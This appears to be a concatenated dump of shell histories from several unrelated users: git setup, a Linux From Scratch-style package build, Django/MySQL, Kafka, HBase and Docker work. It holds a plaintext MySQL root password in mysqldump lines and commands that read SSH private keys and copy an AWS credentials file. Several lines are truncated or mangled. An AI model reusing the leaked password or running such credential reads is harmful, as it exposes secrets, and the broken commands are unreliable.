Hamid' +git config --global user.name "smartforceplus" +git commit -m 'Comitted By Hamid' +git push origin master +more .ssh/id_rsa +ls +exit +git add . +git status +git add -A . +exit +./openerp-server +exit +sudo apt-get update && sudo apt-get upgrade -y && sudo apt-get install -y git tmux vim python3 nmap tcpdump iperf3 +ls +ll +df +ls /media/jwaspin/JWA_usbC/ +ls /media/jwaspin/JWA_usbC/ssh/ +cp /media/jwaspin/JWA_usbC/ssh/jwaspin/* ~/.ssh/ +cp -P /media/jwaspin/JWA_usbC/ssh/jwaspin/* ~/.ssh/ +cp -p /media/jwaspin/JWA_usbC/ssh/jwaspin/* ~/.ssh/ +mkdir .ssh +cp -p /media/jwaspin/JWA_usbC/ssh/jwaspin/* ~/.ssh/ +ll /media/jwaspin/JWA_usbC/ssh/ +ll /media/jwaspin/JWA_usbC/ssh/jwaspin/ +sudo cp /media/jwaspin/JWA_usbC/ssh/* .ssh/ +sudo cp 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+ls +git config --global user.name "XiaChu" +git branch +git checkout master +ssh-keygen -t rsa -b 4096 +less ~/.ssh/id_rsa +less ~/.ssh/id_rsa.pub +git remote add origin git@github.com:XiaChutools/XiaChuTools.git +git push origin master +ls +ls +ls +ls +sudo pico database.php +pico database.php +exit +ls +ls +ls +pico templates.php +ls +pico php.ini +exit +ls +ls +ls +ls +ls +sudo pico header.php +nano header.php +ls +ls +nano editor.js +exit +ls +nano index-stage.php +nano header.php +ls +ls +ls +nano editor.js +ls +ls +ls +mkdir Pen-Tab +ls +ls -l Pen-Tab +ls -l +cp register.php Pen-Tab +ls +ls +chown -R 700 Pen-Tab +sudo chown -R 700 Pen-Tab +ls +chmod -R 700 Pen-Tab +ls -l +ls +rm -rf Pen-Tab +ls +mkdir pen-tab +ls +cp register.php pen-tab +ls +chmod -R 700 pen-tab +ls -l +rm -rf pen-tab +ls +exit +ls +ls +exit +ls +ls +ls +mkdir temp +ls +cp register.php temp +ls +chmod -R 700 temp +ls +ls +pico register.php +exit +ls +ls +ls +mkdir secure +cp register.php secure +ls +chmod -R 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install-dev install-lib +ls -lh /usr/lib/libattr.so +ls -lh /usr/lib/libattr.so* +make clean +make +make -j1 tests root-tests +ls /usr/lib/libattr.so +ls -lh /usr/lib/libattr.so +rm /usr/lib/libattr.so +make install-dev install-lib +ls -lh /usr/lib/libattr.so +ls +rm -r attr-2.4.47 +ls /lib/ +ls /lib/libattr.so +ls /lib/libattr.so/ +ls /lib/libattr.so +ls -lh /lib/libattr.so +ls -lh /lib/libattr.so +ls +ls +tar xvf attr-2.4.47.src.tar.gz +ls +sed -i -e 's|/@pkg_name@|&-@pkg_version@|' include/builddefs.in +sed -i -e "/SUBDIRS/s|man2||" man/Makefile +./configure --prefix=/usr --bindir=/bin --disable-static +make +make -j1 tests root-tests +make install install-dev install-lib +chmod -v 755 /usr/lib/libattr.so +mv -v /usr/lib/libattr.so.* /lib +readlink /usr/lib/libattr.so +ls -lh /usr/lib/libattr +ls -lh /usr/lib/libattr.so +git log +ls -lh /usr/lib/libattr.so +ls -lh /usr/lib +ls -lh /usr/lib/ +rm -r attr-2.4.47 +tar xvf attr-2.4.47.src.tar.gz +ls +sed -i -e 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/usr/lib/libattr.so.* /lib +ls -lh /usr/lib/libattr.so +ln -sfv ../../lib/$(readlink /usr/lib/libattr.so) /usr/lib/libattr.so +rm -r attr-2.4.47 +tar xvf acl-2.2.52.src.tar.gz +sed -i -e 's|/@pkg_name@|&-@pkg_version@|' include/builddefs.in +sed -i "s:| sed.*::g" test/{sbits-restore,cp,misc}.test +sed -i -e "/TABS-1;/a if (x > (TABS-1)) x = (TABS-1);" libacl/__acl_to_any_text.c +./configure --prefix=/usr --bindir=/bin --disable-static --libexecdir=/usr/lib +make +make install install-dev install-lib +chmod -v 755 /usr/lib/libacl.so +ls /usr/lib/libacl.so +ls -lh /usr/lib/libacl.so +mv /usr/lib/libacl.so.* /lib +ls -lh /usr/lib/libacl.so +ln -sfv ../../lib/$(readlink /usr/lib/libacl.so) /usr/lib/libacl.so +ls -lh /usr/lib/libacl.so +rm -r acl-2.2.52 +tar xvf libcap-2.24.tar.xz +ls +sed -i '/install.*STALIBNAME/d' libcap/Makefile +make +make RAISE_SETFCAP=no prefix=/usr install +chmod -v 755 /usr/lib/libcap.so +ls -lh /usr/lib/libcap.so +ls -lh /usr/lib/libcap.so.2 +ls -lah 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Makefile.in);do grep groups.1 $i;done +rm -r shadow-4.2.1 +tar xvf shadow-4.2.1.tar.xz +ls +find man -name Makefile.in -exec sed -i 's/groups\.1 / /' {} \; +find man -name Makefile.in +for i in $(find man -name Makefile.in);do grep man $i;done +sleep 10;sed -i -e 's@#ENCRYPT_METHOD DES@ENCRYPT_METHOD sha512@' -e 's@/var/spool/mail@' etc/login.defs +grep #ENCRYPT_METHOD etc/login.defs +grep \#ENCRYPT_METHOD etc/login.defs +grep -C 4 \#ENCRYPT_METHOD etc/login.defs +grep -C 4 spool etc/login.defs +grep -C 4 spool\/mail etc/login.defs +sed -i -e 's@#ENCRYPT_METHOD DES@ENCRYPT_METHOD sha512@' -e 's@/var/spool/mail@/var/mail@' etc/login.defs +sed -i 's@DICTPATH.*@DICTPATH\t/lib/cracklib/pw_dict@' etc/login.defs +grep cracklib etc/login.defs +sleep 10;sed -i 's/1000/999/' etc/useradd +grep 1000 etc/useradd +sed -i 's/1000/999/' etc/useradd +./configure --sysconfdir=/etc --with-group-name-max-length=32 +make +make install +mv -v /usr/bin/passwd /bin +ls +vi doc/HOWTO +cat doc/HOWTO +less doc/HOWTO +cat doc/HOWTO +cat doc/HOWTO +head doc/HOWTO +pwconv +grpconv +passwd root +rm -r shadow-4.2.1 +tar xvf psmisc-22.21.tar.gz +ls +./configure --prefix=/usr +make +make install +mv -v /usr/bin/fuser /bin +mv -v /usr/bin/killall /bin +ls /usr/bin +pstree +rm -r psmisc-22.21 +tar xvf procps-ng-3.3.11.tar.xz +./configure --prefix=/usr --exec-prefix= --libdir=/usr/lib --docdir=/usr/share/doc/procps-ng-3.3.11 --disable-static --disable-kill +make +sed --help +sleep 10;sed -i -r 's|(pmap_initname)\\\$|\1|' testsuite/pmap.test/pmap.exp +grep pmap_initname testsuite/pmap.test/pmap.exp +sed -i -r 's|(pmap_initname)\\\$|\1|' testsuite/pmap.test/pmap.exp +grep pmap_initname testsuite/pmap.test/pmap.exp +make check +make install +mv -v /usr/lib/libprocps.so.* /lib +ln -sfv ../../lib/$(readlink /usr/lib/libprocps.so) /usr/lib/libprocps.so +rm -r procps-ng-3.3.11 +tar xvf e2fsprogs-1.42.13.tar.gz +ls +mkdir -v build +LIBS=-L/tools/lib CFLAGS=-I/tools/include PKG_CONFIG_PATH=/tools/lib/pkgconfig ../configure --prefix=/usr --bindir=/bin --with-root-prefix="" --enable-elf-shlibs --disable-libblkid --disable-libuuid --disable-uuidd --disable-fsck +make +ln -sfv /tools/lib/lib{blk,uu}id.so.1 lib +make LD_LIBRARY_PATH=/tools/lib check +make install +make install-libs +chmod -v u+w /usr/lib/{libcom_err,libe2p,libext2fs,libss}.a +gunzip -v /usr/share/info/libext2fs.info.gz +install-info --dir-file=/usr/share/info/dir /usr/share/info/libext2fs.info +makeinfo -o doc/com_err.info ../lib/et/com_err.texinfo +install -v -m644 doc/com_err.info /usr/share/info +install-info --dir-file=/usr/share/info/dir /usr/share/info/com_err.info +ls +rm -r build/ +rm -r e2fsprogs-1.42.13 +tar xvf coreutils-8.24.tar.xz +ls +patch -Np1 -i ../coreutils-8.24-i18n-1.patch +cat ../coreutils-8.24-i18n-1.patch +sleep 10;sed -i '/tests\/misc\/sort.pl/ d' Makefile.in +grep tests\/misc\/sort.pl Makefile.in +grep -C 4 tests\/misc\/sort.pl Makefile.in +grep -B 40 tests\/misc\/sort.pl Makefile.in +sed -i '/tests\/misc\/sort.pl/ d' Makefile.in +FORCE_UNSAFE_CONFIGURE=1 ./configure --prefix=/usr --enable-no-install-program=kill,uptime +make +make NON_ROOT_USERNAME=nobody check-root +echo "dummy:x:1000:nobody" >> /etc/group +chown -Rv nobody . +su nobody -s /bin/bash -c "PATH=$PATH make RUN_EXPENSIVE_TESTS=yes check" +sed -i '/dummy/d' /etc/group +make install +mv -v /usr/bin/{cat,chgrp,chmod,chown,cp,date,dd,df,echo} /bin +mv -v /usr/bin/{false,ln,ls,mkdir,mknod,mv,pwd,rm} /bin +mv -v /usr/bin/{rmdir,stty,sync,true,uname} /bin +mv -v /usr/bin/chroot /usr/sbin +mv -v /usr/share/man/man1/chroot.1 /usr/share/man/man8/chroot.8 +sleep 10;sed -i s/\"1\"/\"8\"/1 /usr/share/man/man8/chroot.8 +grep \"1\" /usr/share/man/man8/chroot.8 +sleep 10;sed -i s/\"1\"/\"8\"/1 /usr/share/man/man8/chroot.8 +mv -v /usr/bin/{head,sleep,nice,test,[} /bin +file /bin/[ +[ --help +ls +rm -r coreutils-8.24 +tar xvf iana-etc-2.30.tar.bz2 +ls +make +make install +ls +rm -r iana-etc-2.30 +tar xvf m4-1.4.17.tar.xz +ls +./configure --prefix=/usr +make +make check +cat tests/test-suite.log +vi +ls +make +make check +cat tests/test-update-copyright.sh +make install +m4 --help +rm -r m4-1.4.17 +tar xvf flex-2.5.39.tar.xz +ls +sed -i -e '/test-bison/d' tests/Makefile.in +./configure --prefix=/usr --docdir=/usr/share/doc/flex-2.5.39 +make +make check +make install +ln -sv flex /usr/sbin/lex +rm -r flex-2.5.39 +tar xvf bison-3.0.4.tar.xz +ls +./configure --prefix=/usr --docdir=/usr/share/doc/bison-3.0.4 +make +make check +make install +rm -r bison-3.0.4 +tar xvf grep-2.21.tar.xz +ls +sleep 10;sed -i -e '/tp++/a if (ep <= tp) break;' src/kwset.c +grep tp++ src/kwset.c +grep -C 30 tp++ src/kwset.c +grep -C 3 tp++ src/kwset.c +grep -C 10 tp++ src/kwset.c +sed -i -e '/tp++/a if (ep <= tp) break;' src/kwset.c +grep -C 10 ep src/kwset.c +grep -C ep src/kwset.c +grep ep src/kwset.c +grep 'if (ep src/kwset.c +grep 'if (ep' src/kwset.c +grep -C 5 'if (ep' src/kwset.c +./configure --prefix=/usr --bindir=/bin +make +make check +make install +make check | grep copyright +rm -r grep-2.21 +tar xvf readline-6.3.tar.gz +ls +patch -Np1 -i ../readline-6.3-upstream_fixes-3.patch +sed -i '/MV.*old/d' Makefile.in +sed -i '/{OLDSUFF}/c:' support/shlib-install +grep c: support/shlib-install +./configure --prefix=/usr --disable-static --docdir=/usr/share/doc/readline-6.3 +make SHLIB_LIBS=-lncurses +make SHLIB_LIBS=-lncurses install +mv -v /usr/lib/lib{readline,history}.so.* /lib +ln -sfv ../../lib/$(readlink /usr/lib/libreadline.so) /usr/lib/libreadline.so +ln -sfv ../../lib/$(readlink /usr/lib/libhistory.so) /usr/lib/libhistory.so +install -v -m644 doc/*.{ps,pdf,html,dvi} /usr/share/doc/readline-6.3 +ls +rm -r readline-6.3 +tar xvf bash-4.3.30 +tar xvf bash-4.3.30.tar.gz +ls +patch -Np1 -i ../bash-4.3.30-upstream_fixes-2.patch +./configure --prefix=/usr --bindir=/bin --docdir=/usr/share/doc/bash-4.3.30 --without-bash-malloc --with-installed-readline +make +chown -Rv nobody +chown -Rv nobody . +su nobody -s /bin/bash -c "PATH=$PATH make tests" +make install +exec /bin/bash --login +h +dotnet new webapp +ls +pwd +ls -lah +pwd +mkdir app +ls +dotnet new webapp -o app +ls -lah ../ +ls -lah +lss +ls +ls +cat NuGet.Config +ls +vi NuGet.config +vi mynug.config +dotnet restore --configfile mynug.config +dotnet restore -s /opt/app-root/.nuget/ +ls +dotnet build +dotnet run +vi Properties/launchSettings.json +dotnet run +ls +dotnet build +g++ -o main *.cpp +g++ -o main *.cpp +main +main +main +ifconfig +/etc/init.d/iptables status +ifconfig +su +ifconfig +it status +clear +ls +ls +ls +ls +git clones/auto-enrol-moodle.git +git checkout +git remote -v +git clones/auto-enrol-moodle.git +git clone +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +clear +python study.py +python study.py +python study.py +python study.py +python study.py +cear +clear +cear +clear +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +clear +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +clear +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +clear +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +clear +clear +clear +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +clear +python study.py +clear +python study.py +python study.py +clear +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +clear +clear +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +clear +python study.py +python study.py +clear +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +clear +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +clear +clear +clear +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.p +python study.p +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +clear +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +clear +python study.py +python study.py +clear +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +clear +clear +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +python study.py +sudo su +exit +dir +exit +ssh-keygen +exit +sudo su +dir +dir +ls +ls P* +ls +ls +ls +ls +exit +sudo su +sudo su +exit +sudo su +exit +sudo su +exit +sudo su +exit +sudo su +sudo su +exit +sudo su +exit +sudo su +exit +telnet localhost 9999 +clear +exit +telnet localhost 30000 +clear +ls +sudo su +exit +sudo su +exit +telnet localhost 80 +exit +sud osu +sudo su +ssh root@ +clear +ssh root@ +clear +exit +sudo su +sudo su +ls +ls +ls +ls +ls +ls +sudo su +sudos u +sudo su +exit +sudo su +exit +sudo su +exit +ssh root@master +ls +clear +ls +./shut.sh +sudo su +exit +sudo su +exit +sudo su +exit +sudo su +exit +sudo su +exit +sudo su +exit +sudo su +sudo su +exit +sudo su +exit +bash +sudo su +exit +sudo su +exit +sudo su +exit +sudo su +exit +sudo su +exit +sudo su +exit +ssh sean@ +ping docker6 +ping docker6.intervebc.com +exit +sudo su +cat /etc/network/interfaces +ssh docker4 +sudo su +clear +exit +ssh sean@ +ssh-keygen -f "/home/sean/.ssh/known_hosts" -R +ssh sean@ +exit +exit +sudo su +exit +sudo su +exit +sudo su +exit +exit +ssh root@ubuntu-1.intervebc.com +exit +ssh root@netapp.intervebc.com +ls +exit +sudo su +sudo su +exit +exit +sudo su +exit +exit +sudo su +exit +sudo su +exit +sudo su +exit +exit +sudo su +exit +exit +sudo su +exit +sudo su +exit +sudo su +sudos u +sudo su +exit +ssh student6@ansiblelab.intervebc.com +exit +ls +ssh student6@ansiblelab.intervebc.com +scp student6@ansiblelab.intervebc.com:/storagegrid/foo.py . +scp student6@ansiblelab.intervebc.com:~/foo.py . +scp student6@ansiblelab.intervebc.com:~/storagegrid/foo.py . +ls +pwd +mkdir .aws +ls +scp student6@ansiblelab.intervebc.com:/home/student6/.aws/credentials . +ls +cat credentials +ls +python foo.py +ssh student6@ansiblelab.intervebc.com +pwd +ls +apt-get install boto3 +exit +sudo su +l;s +python foo.py +sudo su +exiut +exit +sudo su +exit +sudo su +exit +sudo su +png master +ping master +sudo su +exit +sudo su +exit +sudo su +exit +sudo su +exit +sudo su +exit +sudo su +exit +sudo su +exit +ls +ls +ls +python3 manage.py collectstatic +nginx -s reload +ls +ls +ls +ls +ls +ls +which nginx +exit +ls +ls +ls +python3 manage.py collectstatic +exit +ls +ls +exit +ls +ls +ls +exit +ls +msql +apt-get install msql +apt-get install mysql +apt-get update +apt-get install -y mysql-server mysql-client libmysqlclient-dev +msql -uroot -p +mysql -uroot -p +mysql -hmysqldb -uroot -p +exit +ls +ls +ls +python3 manage.py createsuperuser +python3 manage.py migrate +python3 manage.py createsuperuser +exit +ls +ls +python3 manage.py createsuperuser +./hoho bash mysql +./hoho bash mariadb +./hoho.sh bash mariadb +exit +ls +python manage.py createsuperuser +python3 -m manage.py createsuperuser +python3 -m manage createsuperuser +exit +ls +ls +ls +ls +ls +ls +ls +cat info.py +exit +ls +exit +/var/log/HoHo_access.log +cat /var/log/HoHo_access.log +ls +cat HoHo_debug.log +exit +ls +s +ls +ls +ks +ls +cat /var/log/HoHo_debug.log +exitr +exit +ls +ls +ls +ls +python3 -m LittlePigHoHo.manage createsuperuser +ls +python3 manage.py createsuperuser +ls +python3 -m manage createsuperuser +exit +ls +ls +ls +cp homepage /root/LittlePigHoHo/server +cp -r homepage /root/LittlePigHoHo/server +ls +ls +mysql -u mysqldb -p +apt-get install mysql +apt-get install mysql-server +apt-get install mysql-server +apt-get update +apt-get install mysql-server +mysql -u mysqldb -p +mysql -u mysqldb -p +mysql -u mysqldb -p +apt-get install -y mysql-client +mysql -umysqldb -p +exit +mysql -h mysqldb -p +mysql -h mysqldb -u root -p +ping mysqldb +apt-get install ping +apt-get install pingus +telinit +telinit --help +apt-get install iputils-ping +ping mysqldb +mysql -h mysqldb -u root +mysql -h mysqldb -u root -p littlepighoho17** +mysql -h mysqldb -u root -p +ls +echo 'littlepighoho17**' | mysqldump -h mysqldb -u root -p hoho > mysql.sql +ls +echo 'littlepighoho17**' +echo littlepighoho17** +echo littlepighoho17** | mysqldump -h mysqldb -u root -p hoho > mysql2.sql +echo littlepighoho17** | mysqldump -h mysqldb -u root -plittlepighoho17** hoho > mysql2.sql +ls +rm -rf mysql.sql mysql2.sql +ls +mysqldump -h mysqldb -u root -plittlepighoho17** hoho > mysql.sql +ls +rm -rf mysql.sql +exit +exit +pip3 install apscheduler +pip3 +pip3 install request +pip3 --help +exit +ls +ls +ls +python3 manage.py collectstatic +python3 manage.py collectstatic +python3 manage.py collectstatic +python3 manage.py collectstatic +python3 manage.py collectstatic +python3 manage.py collectstatic +python3 manage.py collectstatic +python3 manage.py collectstatic -y +python3 manage.py collectstatic +exit +ls +ls +python3 manage.py collectstatic +exit +ls +ceca52e69d54 +python3 /root/LittlePigHoHo/manage.py collectstatic +ls +ls +cat index.css +exit +cat /var/log/HoHo_debug.log +cat /var/log/HoHo_access.log +exit +ls +exit +apt-get install gcc +gcc +exit +lks +ls +ls +ls +python3 a.py +python3 a.py +ls +python3 a.py +python3 a.py +python3 a.py +python3 a.py +llllllllls +ls +python3 manage.py test_data +pip3 install faker +pip install faker +exit +ls +ls +ls +python3 manage.py redis-cluster +exit +config +set +redis +set +log +login +man +login --help +exit +ls +ls +python3 manage.py redis-cluster +python3 manage.py redis-cluster +python3 manage.py redis-cluster +python3 manage.py redis-cluster +python3 manage.py redis-cluster +python3 manage.py redis-cluster +python3 manage.py redis-cluster +python3 manage.py redis-cluster +python3 manage.py redis-cluster +python3 manage.py redis-cluster +python3 manage.py redis-cluster +python3 manage.py redis-cluster +python3 manage.py redis-cluster +python3 manage.py redis-cluster +python3 manage.py redis-cluster +python3 manage.py redis-cluster +python3 manage.py redis-cluster +exit +ls +python3 manage.py redis-cluster +python3 manage.py redis-cluster +exit +ps +ls +ls +ls +python3 manage.py makemigrations +python3 manage.py migrate +exit +start-zookeeper +jps +jps -lvm +start-kafka +stop-kafka +ls +ls +./kafka-console-consumer.sh --from-beginning +ls +./kafka-topics.sh --zookeeper localhost:3128 --list +./kafka-topics.sh --zookeeper localhost:2181 --list +./kafka-topics.sh --list --zookeeper localhost:2181 +./kafka-topics.sh --create --zookeeper localhost:2181 --replication-factor 1 --partitions 3 --topic newtopic +./kafka-topics.sh --create --zookeeper localhost:2181 --replication-factor 0 --partitions 3 --topic newtopic +./kafka-topics.sh --create --zookeeper localhost:2181 --replication-factor 1 --partitions 3 --topic newtopic +./kafka-topics.sh --create --zookeeper localhost:2181 --replication-factor 1 --partitions 3 --topic newtopic +./kafka-topics.sh --create --zookeeper localhost:2181 --replication-factor 1 --partitions 3 --topic newtopic +./kafka-topics.sh --create --zookeeper localhost:2181/kafka --replication-factor 1 --partitions 3 --topic newtopic +./kafka-topics.sh --list --zookeeper localhost:2181/kafka +./kafka-topics.sh --list --zookeeper localhost:2181/kafka +ls +ls +ls -ll +ls +pwd +ls -la +ls -lah +cat .bash_profile +cat /etc/bashrc +cat /etc/bashrc +clear +clear +clear +cat /etc/bashrc +cat .bash_profile +ls -lah +cat .bash_sessions +cat .bash_profile +sudo su +cat /etc/bashrc +edho $PATH +edho '$PATH' +echo '$PATH' +echo '${PATH}' +echo $PATH +echo $HBASE_HOME +echo $HADOOP_HOME +CD .bash_sessions +ls +ls /etc +ls -la /etc +ls -lah /etc/ +cat /ete/bashrc_Apple_Terminal +cat /etc/bashrc_Apple_Terminal +ls -lah /etc/ +cat /etc/bashrc_Apple_Terminal +cat .bash_profile +nano .bash_profile +hadoop-start +./kafka-topics.sh --list --zookeeper localhost:2181/kafka +./kafka-topics.sh --list --zookeeper localhost:2181/kafka +ls +bin/atlas_start.py +curl -u username:passwordst:21000/api/atlas/admin/version +bin/quick_start.py +admin +export MANAGE_LOCAL_HBASE=true +export MANAGE_LOCAL_SOLR=true +ls bin +bin/atlas_stop.py +bin/atlas_start.py +bin/atlas_stop.py +hadoop-start +brew install go +go env +go version +ssh root:hadoop@ +ssh root@ +ssh root@ +ssh +ssh +ssh +ssh root@localhost -p 2222 +ssh root@localhost -p 2222 +ls +ls +sbt package assembly +git config --global core.autocrlf +git config --global core.autocrlf false + git config --global core.autocrlf input +git rm --cached -r . && git reset --hard +sbt package assembly +ssh root@localhost -p 2222 +ls +ls target/ +ls target/scala-2.12/ +scp -P 2222 target/scala-2.12/linkit_2.12-0.1.jar root@sandbox-hdp.hortonworks.com:/tmp +scp -P 2222 target/scala-2.12/linkit_2.12-0.1.jar root@sandbox-hdp.hortonworks.com:/tmp +scp -P 2222 target/scala-2.12/linkit_2.12-0.1.jar root@sandbox-hdp.hortonworks.com:/tmp/ +scp -P 2222 target/scala-2.11/linkit_2.11-0.1.jar root@sandbox-hdp.hortonworks.com:/tmp/ +scp -P 2222 target/scala-2.11/linkit_2.11-0.1.jar root@sandbox-hdp.hortonworks.com:/tmp/ +scp -P 2222 target/scala-2.11/linkit-assembly-0.1.jar root@sandbox-hdp.hortonworks.com:/tmp/ +scp -P 2222 target/scala-2.11/linkit-assembly-0.1.jar root@sandbox-hdp.hortonworks.com:/tmp/ +scp -P 2222 target/scala-2.11/linkit-assembly-0.1.jar root@sandbox-hdp.hortonworks.com:/tmp/ +scp -P 2222 target/scala-2.11/linkit-assembly-0.1.jar root@sandbox-hdp.hortonworks.com:/tmp/ +scp -P 2222 target/scala-2.11/linkit-assembly-0.1.jar root@sandbox-hdp.hortonworks.com:/tmp/ +scp -P 2222 target/scala-2.11/linkit-assembly-0.1.jar root@sandbox-hdp.hortonworks.com:/tmp/ +scp -P 2222 target/scala-2.11/linkit-assembly-0.1.jar root@sandbox-hdp.hortonworks.com:/tmp/ +scp -P 2222 target/scala-2.11/linkit-assembly-0.1.jar root@sandbox-hdp.hortonworks.com:/tmp/ +scp -P 2222 target/scala-2.11/linkit-assembly-0.1.jar root@sandbox-hdp.hortonworks.com:/tmp/ +scp -P 2222 target/scala-2.11/linkit-assembly-0.1.jar root@sandbox-hdp.hortonworks.com:/tmp/ +scp -P 2222 target/scala-2.11/linkit-assembly-0.1.jar root@sandbox-hdp.hortonworks.com:/tmp/ +scp -P 2222 target/scala-2.11/linkit-assembly-0.1.jar root@sandbox-hdp.hortonworks.com:/tmp/ +scp -P 2222 target/scala-2.11/linkit-assembly-0.1.jar root@sandbox-hdp.hortonworks.com:/tmp/ +ls +ls tests/ +scp -P 2222 target/scala-2.11/linkit-assembly-0.1.jar root@sandbox-hdp.hortonworks.com:/tmp/ +scp -P 2222 target/scala-2.11/linkit-assembly-0.1.jar root@sandbox-hdp.hortonworks.com:/tmp/ +exit +ssh-keygen -t rsa +ls -la +ls .ssh +scp -P 2222 .ssh/id_rsa.pub root@sandbox-hdp.hortonworks.com:/tmp +start-zookeeper +start-hbase +jps +jps -l +jps -lma +jps -mlvV +stop-zookeeper +stop-hbase +start-hb-zk +pjs +jps +ls /Library/Java/JavaVirtualMachines/jdk1.8.0_111.jdk/Contents/Home/bin/java +ls /Library/Java/JavaVirtualMachines/jdk1.8.0_111.jdk/Contents/Home/bin/ +ls /Library/Java/JavaVirtualMachines/jdk1.8.0_111.jdk/Contents/Home +ls /Library/Java/JavaVirtualMachines/ +ls /Library/Java/JavaVirtualMachines/ +echo $JAVA_HOME +alias start-hbase +ls +ls -la +cat .bash_profile +vi .bash_profile +cat .bash_profile +bash +reload +source ~/.bash_profile +start-hbase +start-hbase +kill -9 5127 +start-hbase +stop-zookeeper +jps +stop-hbase +jps +kill -9 5347 +jps +start-hbase +hbase shell +hbase-shell +hbase +jps +hbase-shell +hbase-shel +hbase shell +hbase +ls +ls bin +bin/hbase +bin/hbase shell +bin/hbase shell +stop-hbase +start-hbase +hbase -version +hbase +ls +ls bin +bin/hbase -version +bin/hbase version +stop-hbase +start-hbase +/opt/local/hbase-1.4.2/conf/hbase-env.sh; exit +export KAFKA=`docker-machine ip \`docker-machine active\``:9092 +docker-machine env default +docker-machine env default +docker-machine ip +git clonest.git +git branch +ls +git branch +git clonesoncesar/big-data-engineer-test.git +pwd +git clonesoncesar/big-data-engineer-test.git +ls +git clonesoncesar/big-data-engineer-test.git +docker ps -ls +export KAFKA=`docker-machine ip \`docker-machine active\``:9092 +kafka-console-producer.sh --broker-list $KAFKA --topic test +docker ps -ls +docker exec -it competent_mclean /bin/bash +docker ip default +docker ip +docker-machine ip default +docker-machine ls +docker-machine create +export KAFKA=`docker-machine ip \`docker-machine active\``:9092 +export KAFKA=`docker-machine ip \`competent_mclean\``:9092 +export KAFKA=`docker-machine ip default \`competent_mclean\``:9092 +export KAFKA=`competent_mclean\`competent_mclean\``:9092 +docker-machine create +docker-machine ip default +docker-machine -ls +docker-machine create +docker-machine create --driver virtualbox default +docker-machine -ls +docker-machine -ls ip +docker-machine -ls export KAFKA=`docker-machine ip \`docker-machine active\``:9092 +export KAFKA=`docker-machine ip \`docker-machine active\``:9092 +export KAFKA=`docker-machine ip \`docker-machine active\``:9092 +docker-machine active +eval $(docker-machine env default) +docker-machine active +export KAFKA=`docker-machine ip \`docker-machine active\``:9092 +export KAFKA=`docker-machine ip \`docker-machine active\``:9092 +kafka-console-producer.sh --broker-list $KAFKA --topic test +kafka-console-producer.sh --broker-list $KAFKA --topic test +kafka-console-consumer.sh --zookeeper $ZOOKEEPER --topic test +docker run -p 2181:2181 -p 9092:9092 --env ADVERTISED_HOST=`docker-machine ip \`docker-machine active\`` --env ADVERTISED_PORT=9092 spotify/kafka +docker-machine ip +docker run -p 2181:2181 -p 9092:9092 --env ADVERTISED_HOST=`docker-machine ip \`docker-machine active\`` --env ADVERTISED_PORT=9092 spotify/kafka +docker run -p 2181:2181 -p 9092:9092 --env ADVERTISED_HOST=`docker-machine ip \`docker-machine active\`` --env ADVERTISED_PORT=9092 spotify/kafka +docker-machine ip +export KAFKA=`docker-machine ip \`docker-machine active\``:9092 +docker-machine ip +docker-machine active +docker-machine env default +eval $(docker-machine env default) +docker-machine active +export KAFKA=`docker-machine ip \`docker-machine active\``:9092 +kafka-console-producer.sh --broker-list $KAFKA --topic test +docker ps -ls +eval $(docker-machine env spotify/kafkaproxy) +echo $KAFKA +ls +ls +ls +kafka-console-producer.sh --broker-list $KAFKA --topic test +/kafka-console-producer.sh --broker-list $KAFKA --topic test +./kafka-console-producer.sh --broker-list $KAFKA --topic test +docker-machine ip +eval "$(docker-machine env default)" +docker-machine ip default +ls +bin/kafka-console-producer.sh --broker-list localhost:9092 --topic test +bin/kafka-console-producer.sh --broker-list localhost:9092 --topic test +bin/kafka-console-producer.sh --broker-list localhost:9092 --topic test +docker-machine ip +bin/kafka-console-producer.sh --broker-list --topic test +bin/kafka-console-producer.sh --broker-list --topic test +bin/kafka-console-consumer.sh --bootstrap-server localhost:9092 --topic test --from-beginning +bin/kafka-console-consumer.sh --bootstrap-server localhost:9092 --topic test --from-beginning +bin/kafka-console-consumer.sh --bootstrap-server localhost:9092 --topic test --from-beginning +bin/kafka-console-consumer.sh --bootstrap-server --topic test --from-beginning +bin/kafka-console-consumer.sh --bootstrap-server --topic test --from-beginning +bin/kafka-console-consumer.sh --bootstrap-server --topic test --from-beginning +docker ps -ls +docker-machine ip +docker-machine ip default +docker-machine env default +docker-machine create default +docker-machine run default +docker run +docker-machine start +docker-machine ip +eval "$(docker-machine env default)" +export KAFKA=`docker-machine ip \`docker-machine active\``:9092 +docker run -p 2181:2181 -p 9092:9092 --env ADVERTISED_HOST=`docker-machine ip \`docker-machine active\`` --env ADVERTISED_PORT=9092 spotify/kafka +bin/kafka-console-consumer.sh --bootstrap-server localhost:9092 --topic linkit_dangerous_driver --from-beginning +docker ps +docker stop AMES +docker ps -ls +docker stop tensorflow +docker 1b25b59a3b11 +docker ps -ls +docker rm $(docker ps -a -q) +docker ps -ls +docker ps -ls 